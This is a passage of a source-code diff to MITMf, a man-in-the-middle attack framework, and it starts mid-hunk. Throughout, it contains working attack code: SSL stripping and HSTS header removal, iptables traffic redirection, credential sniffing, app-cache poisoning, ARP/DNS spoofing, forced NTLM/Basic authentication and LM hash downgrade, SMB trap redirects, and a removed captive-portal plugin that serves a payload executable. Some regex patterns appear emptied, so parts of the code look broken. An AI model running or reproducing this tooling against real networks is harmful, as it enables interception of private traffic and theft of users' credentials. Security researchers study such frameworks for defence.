server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1) + else: + server1 = ThreadingTCPServer(('', 445), SMB1) + server2 = ThreadingTCPServer(('', 139), SMB1) for server in [server1, server2]: t = threading.Thread(name='SMB', target=server.serve_forever) diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index f9a2719..f196842 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -155,7 +155,7 @@ class ServerConnection(HTTPClient): self.isCompressed = True elif (key.lower()== 'strict-transport-security'): - clientlog.info("Zapped a strict-transport-security header", extra=self.clientInfo) + clientlog.info("Zapped a strict-trasport-security header", extra=self.clientInfo) elif (key.lower() == 'content-length'): self.contentLength = value @@ -179,7 +179,7 @@ class ServerConnection(HTTPClient): self.plugins.hook() if logging.getLevelName(log.getEffectiveLevel()) == "DEBUG": - for header, value in self.headers.iteritems(): + for header, value in self.client.headers.iteritems(): log.debug("Receiving header: ({}: {})".format(header, value)) def handleResponsePart(self, data): diff --git a/core/utils.py b/core/utils.py index 7781bad..c3ae067 100644 --- a/core/utils.py +++ b/core/utils.py @@ -98,5 +98,5 @@ class iptables: def NFQUEUE(self): log.debug("Setting iptables NFQUEUE rule") - os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0') + os.system('iptables -t nat -A PREROUTING -j NFQUEUE --queue-num 1') self.nfqueue = True \ No newline at end of file diff --git a/libs/bdfactory b/libs/bdfactory index d2f3521..dadf1d2 160000 --- a/libs/bdfactory +++ b/libs/bdfactory @@ -1 +1 @@ -Subproject commit d2f352139f23ed642fa174211eddefb95e6a8586 +Subproject commit dadf1d21bfcb9c8ebefc7891bd95b9452b2af8d5 diff --git a/logs/.gitignore b/logs/.gitignore index 364db4d..cf7c24d 100644 --- a/logs/.gitignore +++ b/logs/.gitignore @@ -1,5 +1,5 @@ * !.gitignore !responder/ -!dns/ +!dnschef/ !ferret-ng/ diff --git a/logs/dns/.gitignore b/logs/dnschef/.gitignore similarity index 100% rename from logs/dns/.gitignore rename to logs/dnschef/.gitignore diff --git a/mitmf.py b/mitmf.py index 03c7ed3..08a8b73 100755 --- a/mitmf.py +++ b/mitmf.py @@ -41,7 +41,7 @@ mitmf_version = '0.9.8' mitmf_codename = 'The Dark Side' if os.geteuid() != 0: - sys.exit("[-] The derp is strong with this one\nTIP: you may run MITMf as root.") + sys.exit("[-] The derp is strong with this one") parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename), version="{} - '{}'".format(mitmf_version, mitmf_codename), @@ -52,14 +52,14 @@ parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_ver #add MITMf options sgroup = parser.add_argument_group("MITMf", "Options for MITMf") sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") -sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on") +sgroup.add_argument("-i", dest='interface', type=str, help="Interface to listen on") sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use") sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching") sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit') sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") -sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic', nargs='+') +sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic') #Initialize plugins and pass them the parser NameSpace object plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()] @@ -73,15 +73,6 @@ options = parser.parse_args() #Set the log level logger().log_level = logging.__dict__[options.log_level.upper()] -from core.logger import logger -formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") -log = logger().setup_logger("MITMf", formatter) - -from core.netcreds import NetCreds - -if options.read_pcap: - NetCreds().parse_pcap(options.read_pcap) - #Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object from core.utils import get_ip, get_mac, shutdown options.ip = get_ip(options.interface) @@ -89,18 +80,33 @@ options.mac = get_mac(options.interface) settings.Config.populate(options) +from core.logger import logger +formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") +log = logger().setup_logger("MITMf", formatter) + log.debug("MITMf started: {}".format(sys.argv)) #Start Net-Creds -print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) - -NetCreds().start(options.interface, options.ip) -print "|" -print "|_ Net-Creds v{} online".format(NetCreds.version) +from core.netcreds import NetCreds +NetCreds().start(options.interface, options.ip, options.read_pcap) +from core.sslstrip.CookieCleaner import CookieCleaner from core.proxyplugins import ProxyPlugins +from core.sslstrip.StrippingProxy import StrippingProxy +from core.sslstrip.URLMonitor import URLMonitor + +URLMonitor.getInstance().setFaviconSpoofing(options.favicon) +URLMonitor.getInstance().setCaching(options.preserve_cache) +CookieCleaner.getInstance().setEnabled(options.killsessions) + +strippingFactory = http.HTTPFactory(timeout=10) +strippingFactory.protocol = StrippingProxy + +reactor.listenTCP(options.listen_port, strippingFactory) ProxyPlugins().all_plugins = plugins + +print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename) for plugin in plugins: #load only the plugins that have been called at the command line @@ -120,64 +126,48 @@ for plugin in plugins: for line in xrange(0, len(plugin.tree_info)): print "| |_ {}".format(plugin.tree_info.pop()) + plugin.reactor(strippingFactory) plugin.start_config_watch() +print "|" +print "|_ Sergio-Proxy v0.2.1 online" +print "|_ SSLstrip v0.9 by Moxie Marlinspike online" +print "|" + if options.filter: from core.packetfilter import PacketFilter pfilter = PacketFilter(options.filter) + pfilter.start() print "|_ PacketFilter online" - for filter in options.filter: - print " |_ Applying filter {} to incoming packets".format(filter) - try: - pfilter.start() - except KeyboardInterrupt: - pfilter.stop() - shutdown() + print "| |_ Applying filter {} to incoming packets".format(options.filter) -else: - from core.sslstrip.CookieCleaner import CookieCleaner - from core.sslstrip.StrippingProxy import StrippingProxy - from core.sslstrip.URLMonitor import URLMonitor +print "|_ Net-Creds v{} online".format(NetCreds.version) - URLMonitor.getInstance().setFaviconSpoofing(options.favicon) - URLMonitor.getInstance().setCaching(options.preserve_cache) - CookieCleaner.getInstance().setEnabled(options.killsessions) +#Start mitmf-api +from core.mitmfapi import mitmfapi +print "|_ MITMf-API online" +mitmfapi().start() - strippingFactory = http.HTTPFactory(timeout=10) - strippingFactory.protocol = StrippingProxy +#Start the HTTP Server +from core.servers.HTTP import HTTP +HTTP().start() +print "|_ HTTP server online" - reactor.listenTCP(options.listen_port, strippingFactory) +#Start DNSChef +from core.servers.DNS import DNSChef +DNSChef().start() +print "|_ DNSChef v{} online".format(DNSChef.version) - for plugin in plugins: - if vars(options)[plugin.optname] is True: - plugin.reactor(strippingFactory) +#Start the SMB server +from core.servers.SMB import SMB +SMB().start() +print "|_ SMB server online\n" - print "|_ Sergio-Proxy v0.2.1 online" - print "|_ SSLstrip v0.9 by Moxie Marlinspike online" +#start the reactor +reactor.run() +print "\n" - #Start mitmf-api - from core.mitmfapi import mitmfapi - print "|" - print "|_ MITMf-API online" - mitmfapi().start() +if options.filter: + pfilter.stop() - #Start the HTTP Server - from core.servers.HTTP import HTTP - HTTP().start() - print "|_ HTTP server online" - - #Start DNSChef - from core.servers.DNS import DNSChef - DNSChef().start() - print "|_ DNSChef v{} online".format(DNSChef.version) - - #Start the SMB server - from core.servers.SMB import SMB - SMB().start() - print "|_ SMB server online\n" - - #start the reactor - reactor.run() - print "\n" - - shutdown() +shutdown() \ No newline at end of file diff --git a/plugins/appcachepoison.py b/plugins/appcachepoison.py index 505c5f6..c456db2 100644 --- a/plugins/appcachepoison.py +++ b/plugins/appcachepoison.py @@ -36,7 +36,6 @@ class AppCachePlugin(Plugin): from core.sslstrip.URLMonitor import URLMonitor self.urlMonitor = URLMonitor.getInstance() - self.urlMonitor.caching = True self.urlMonitor.setAppCachePoisoning() def response(self, response, request, data): @@ -73,25 +72,29 @@ class AppCachePlugin(Plugin): p = self.getTemplatePrefix(section) self.clientlog.info("Poisoning raw URL", extra=request.clientInfo) if os.path.exists(p + '.replace'): # replace whole content - with open(p + '.replace', 'r') as f: - data = f.read() + f = open(p + '.replace', 'r') + data = f.read() + f.close() elif os.path.exists(p + '.append'): # append file to body - with open(p + '.append', 'r') as f: - data += f.read() + f = open(p + '.append', 'r') + data += f.read() + f.close() elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)): self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo) p = self.getTemplatePrefix(section) self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo) if os.path.exists(p + '.replace'): # replace whole content - with open(p + '.replace', 'r') as f: - data = f.read() + f = open(p + '.replace', 'r') + data = f.read() + f.close() elif os.path.exists(p + '.append'): # append file to body - with open(p + '.append', 'r') as f: - appendix = f.read() - data = re.sub(re.compile("", re.IGNORECASE), appendix + "", data) #append to body + f = open(p + '.append', 'r') + appendix = f.read() + data = re.sub(re.compile("",re.IGNORECASE), appendix + "", data) #append to body + f.close() # add manifest reference data = re.sub(re.compile(" - -

Please click here if you are not redirected automatically

- - '''.format(self.portalurl) - response.redirect(self.portalurl) - - return {'response': response, 'request':request, 'data': data} - - def options(self, options): - ''' captive can be either run redirecting to a specified url (--portalurl), serve the payload locally (no argument) or - start an instance of SimpleHTTPServer to serve the LOCALDIR (--portaldir) ''' - group = options.add_mutually_exclusive_group(required=False) - group.add_argument('--portalurl', dest='portalurl', metavar="URL", help='Specify the URL where the portal is located, e.g. http://example.com.') - group.add_argument('--portaldir', dest='portaldir', metavar="LOCALDIR", help='Specify a local path containg the portal files served with a SimpleHTTPServer on a different port (see config).') - - options.add_argument('--use-dns', dest='usedns', action='store_true', help='Whether we use dns spoofing to serve from a fancier portal URL captive.portal when used without options or portaldir. Requires DNS for "captive.portal" to resolve, e.g. via configured dns spoofing --dns.') - - def on_shutdown(self): - '''This will be called when shutting down''' - pass - - def serve_portal(self): - - self.portalurl = 'http://{}/portal.html'.format(self.hostname) - - from core.servers.HTTP import HTTP - HTTP.add_static_endpoint('portal.html','text/html', './config/captive/portal.html') - HTTP.add_static_endpoint('CaptiveClient.exe','application/octet-stream', self.config['Captive']['PayloadFilename']) - self.tree_info.append("Portal login served by built-in HTTP server.") - - - def serve_dir(self, dir): - import threading - import posixpath - import urllib - import os - from SimpleHTTPServer import SimpleHTTPRequestHandler - from BaseHTTPServer import HTTPServer as ServerClass - Protocol = "HTTP/1.0" - port = self.config['Captive']['Port'] - ServerString = self.config['Captive']['ServerString'] - - self.portalurl = "http://{}:{}/".format(self.hostname, port) - - ROUTES = (['', dir],) - class HandlerClass(SimpleHTTPRequestHandler): - '''HandlerClass adapted from https://gist.github.com/creativeaura/5546779''' - - def translate_path(self, path): - '''translate path given routes''' - - # set default root to cwd - root = os.getcwd() - - # look up routes and set root directory accordingly - for pattern, rootdir in ROUTES: - if path.startswith(pattern): - # found match! - path = path[len(pattern):] # consume path up to pattern len - root = rootdir - break - - # normalize path and prepend root directory - path = path.split('?',1)[0] - path = path.split('#',1)[0] - path = posixpath.normpath(urllib.unquote(path)) - words = path.split('/') - words = filter(None, words) - - path = root - for word in words: - drive, word = os.path.splitdrive(word) - head, word = os.path.split(word) - if word in (os.curdir, os.pardir): - continue - path = os.path.join(path, word) - - return path - - - server_address = ('0.0.0.0', int(port)) - HandlerClass.protocol_version = Protocol - HandlerClass.server_version = ServerString - - httpd = ServerClass(server_address, HandlerClass) - ServerClass.path = dir - - sa = httpd.socket.getsockname() - try: - t = threading.Thread(name='PortalServer', target=httpd.serve_forever) - t.setDaemon(True) - t.start() - self.tree_info.append("Portal Server instance running on port {} serving {}".format(port, dir)) - except Exception as e: - shutdown("Failed to start Portal Server") diff --git a/plugins/ferretng.py b/plugins/ferretng.py index fbe7e7d..2bdfbf7 100644 --- a/plugins/ferretng.py +++ b/plugins/ferretng.py @@ -45,6 +45,7 @@ class FerretNG(Plugin): with open(options.cookie_file, 'r') as cookie_file: self.cookie_file = json.dumps(cookie_file.read()) URLMonitor.getInstance().cookies = self.cookie_file + cookie_file.close() except Exception as e: shutdown("[-] Error loading cookie log file: {}".format(e)) @@ -93,3 +94,4 @@ class FerretNG(Plugin): self.log.info("Writing cookies to log file") with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file: cookie_file.write(str(URLMonitor.getInstance().cookies)) + cookie_file.close() diff --git a/plugins/filepwn.py b/plugins/filepwn.py index 571d5ed..83d947c 100644 --- a/plugins/filepwn.py +++ b/plugins/filepwn.py @@ -611,14 +611,14 @@ class FilePwn(Plugin): def response(self, response, request, data): - content_header = response.responseHeaders.getRawHeaders('Content-Type')[0] + content_header = response.headers['content-type'] client_ip = request.client.getClientIP() host = request.headers['host'] - if not response.responseHeaders.hasHeader('content-length'): - content_length = None - else: - content_length = int(response.responseHeaders.getRawHeaders('content-length')[0]) + try: + content_length = int(response.headers['content-length']) + except KeyError: + content_length = None for target in self.user_config['targets'].keys(): if target == 'ALL': diff --git a/plugins/imagerandomizer.py b/plugins/imagerandomizer.py deleted file mode 100644 index 268123a..0000000 --- a/plugins/imagerandomizer.py +++ /dev/null @@ -1,57 +0,0 @@ -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import random -import os -from plugins.plugin import Plugin - -class ImageRandomizer(Plugin): - name = "ImageRandomizer" - optname = "imgrand" - desc = 'Replaces images with a random one from a specified directory' - version = "0.1" - - def initialize(self, options): - self.options = options - self.img_dir = options.img_dir - - def responseheaders(self, response, request): - '''Kill the image skipping that's in place for speed reasons''' - if request.isImageRequest: - request.isImageRequest = False - request.isImage = True - self.imageType = response.responseHeaders.getRawHeaders('content-type')[0].split('/')[1].upper() - - def response(self, response, request, data): - try: - isImage = getattr(request, 'isImage') - except AttributeError: - isImage = False - - if isImage: - try: - img = random.choice(os.listdir(self.options.img_dir)) - with open(os.path.join(self.options.img_dir, img), 'rb') as img_file: - data = img_file.read() - self.clientlog.info("Replaced image with {}".format(img), extra=request.clientInfo) - return {'response': response, 'request': request, 'data': data} - except Exception as e: - self.clientlog.info("Error: {}".format(e), extra=request.clientInfo) - - def options(self, options): - options.add_argument("--img-dir", type=str, metavar="DIRECTORY", help="Directory with images") \ No newline at end of file diff --git a/plugins/inject.py b/plugins/inject.py index b71218c..27bda03 100644 --- a/plugins/inject.py +++ b/plugins/inject.py @@ -61,13 +61,10 @@ class Inject(Plugin): ip = response.getClientIP() hn = response.getRequestHostname() - if not response.responseHeaders.hasHeader('Content-Type'): - return {'response': response, 'request':request, 'data': data} - - mime = response.responseHeaders.getRawHeaders('Content-Type')[0] - - if "text/html" not in mime: - return {'response': response, 'request':request, 'data': data} + try: + mime = response.headers['Content-Type'] + except KeyError: + return if "charset" in mime: match = re.search('charset=(.*)', mime) diff --git a/plugins/plugin.py b/plugins/plugin.py index c90d01f..f42efd6 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -31,7 +31,6 @@ class Plugin(ConfigWatcher): def __init__(self, parser): '''Passed the options namespace''' - if self.desc: sgroup = parser.add_argument_group(self.name, self.desc) else: diff --git a/plugins/replace.py b/plugins/replace.py index d5339b2..47e5f9f 100644 --- a/plugins/replace.py +++ b/plugins/replace.py @@ -35,7 +35,7 @@ class Replace(Plugin): self.options = options def response(self, response, request, data): - mime = response.responseHeaders.getRawHeaders('Content-Type')[0] + mime = response.headers['Content-Type'] hn = response.getRequestHostname() if "text/html" in mime: diff --git a/plugins/responder.py b/plugins/responder.py index 2f36be3..983a904 100644 --- a/plugins/responder.py +++ b/plugins/responder.py @@ -91,5 +91,5 @@ class Responder(Plugin): options.add_argument('--fingerprint', dest="finger", action="store_true", help="Fingerprint hosts that issued an NBT-NS or LLMNR query") options.add_argument('--lm', dest="lm", action="store_true", help="Force LM hashing downgrade for Windows XP/2003 and earlier") options.add_argument('--wpad', dest="wpad", action="store_true", help="Start the WPAD rogue proxy server") - options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Force NTLM/Basic authentication on wpad.dat file retrieval (might cause a login prompt)") - options.add_argument('--basic', dest="basic", action="store_true", help="Return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") + options.add_argument('--forcewpadauth', dest="forcewpadauth", action="store_true", help="Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False") + options.add_argument('--basic', dest="basic", action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned") diff --git a/plugins/screenshotter.py b/plugins/screenshotter.py index a8a3806..cd69328 100644 --- a/plugins/screenshotter.py +++ b/plugins/screenshotter.py @@ -46,6 +46,7 @@ class ScreenShotter(Inject, Plugin): try: with open('./logs/' + img_file, 'wb') as img: img.write(base64.b64decode(urllib.unquote(request.postData).decode('utf8').split(',')[1])) + img.close() self.clientlog.info('Saved screenshot to {}'.format(img_file), extra=request.clientInfo) except Exception as e: diff --git a/plugins/smbtrap.py b/plugins/smbtrap.py index 8e8ca03..ceec87f 100644 --- a/plugins/smbtrap.py +++ b/plugins/smbtrap.py @@ -33,6 +33,6 @@ class SMBTrap(Plugin): return {"request": request, "version": version, "code": 302, "message": "Found"} def responseheaders(self, response, request): - self.clientlog.info("Trapping request to {}".format(request.headers['host']), extra=request.clientInfo) + self.clientlog.info("Trapping request to {}".format(request.headers['host'])) rand_path = ''.join(random.sample(string.ascii_uppercase + string.digits, 8)) - response.responseHeaders.setRawHeaders('Location', ["file://{}/{}".format(self.ip, rand_path)]) + response.headers["Location"] = "file://{}/{}".format(self.ip, rand_path) diff --git a/plugins/spoof.py b/plugins/spoof.py index dafe4b1..0d6f46b 100644 --- a/plugins/spoof.py +++ b/plugins/spoof.py @@ -70,7 +70,7 @@ class Spoof(Plugin): if options.dns: self.tree_info.append('DNS spoofing enabled') - if iptables().dns is False and options.filter is None: + if iptables().dns is False: iptables().DNS(self.config['MITMf']['DNS']['port']) if not options.arp and not options.icmp and not options.dhcp and not options.dns: @@ -78,7 +78,7 @@ class Spoof(Plugin): set_ip_forwarding(1) - if iptables().http is False and options.filter is None: + if iptables().http is False: iptables().HTTP(options.listen_port) for protocol in self.protocol_instances: @@ -96,7 +96,7 @@ class Spoof(Plugin): options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]') options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]') options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison') - options.add_argument('--arpmode', type=str, dest='arpmode', default='rep', choices=["rep", "req"], help='ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') + options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]') def on_shutdown(self): from core.utils import iptables, set_ip_forwarding diff --git a/plugins/sslstrip+.py b/plugins/sslstrip+.py index 9266040..109e721 100644 --- a/plugins/sslstrip+.py +++ b/plugins/sslstrip+.py @@ -33,7 +33,7 @@ class SSLstripPlus(Plugin): from core.servers.DNS import DNSChef from core.utils import iptables - if iptables().dns is False and options.filter is False: + if iptables().dns is False: iptables().DNS(self.config['MITMf']['DNS']['port']) URLMonitor.getInstance().setHstsBypass() diff --git a/plugins/upsidedownternet.py b/plugins/upsidedownternet.py index a293dd1..71579b9 100644 --- a/plugins/upsidedownternet.py +++ b/plugins/upsidedownternet.py @@ -34,7 +34,7 @@ class Upsidedownternet(Plugin): if request.isImageRequest: request.isImageRequest = False request.isImage = True - self.imageType = response.responseHeaders.getRawHeaders('content-type')[0].split('/')[1].upper() + self.imageType = response.headers['content-type'].split('/')[1].upper() def response(self, response, request, data): try: diff --git a/requirements.txt b/requirements.txt index b0dce5a..e1c67d1 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,4 +1,4 @@ -git+https://github.com/kti/python-netfilterqueue +git+git://github.com/kti/python-netfilterqueue pyinotify pycrypto pyasn1 @@ -23,4 +23,4 @@ python-magic msgpack-python requests pypcap -chardet +chardet \ No newline at end of file diff --git a/setup.sh b/setup.sh new file mode 100755 index 0000000..3c8052a --- /dev/null +++ b/setup.sh @@ -0,0 +1,3 @@ +#!/usr/bin/env bash + +git submodule init && git submodule update --recursive \ No newline at end of file diff --git a/tests/basic_tests.py b/tests/basic_tests.py index 155a3d7..5b68896 100644 --- a/tests/basic_tests.py +++ b/tests/basic_tests.py @@ -24,7 +24,7 @@ class BasicTests(unittest.TestCase): from core.logger import logger logger.log_level = logging.DEBUG from core.netcreds import NetCreds - NetCreds().start('venet0:0', '172.30.96.18') + NetCreds().start('venet0:0', '172.30.96.18', None) def test_SSLStrip_Proxy(self): favicon = True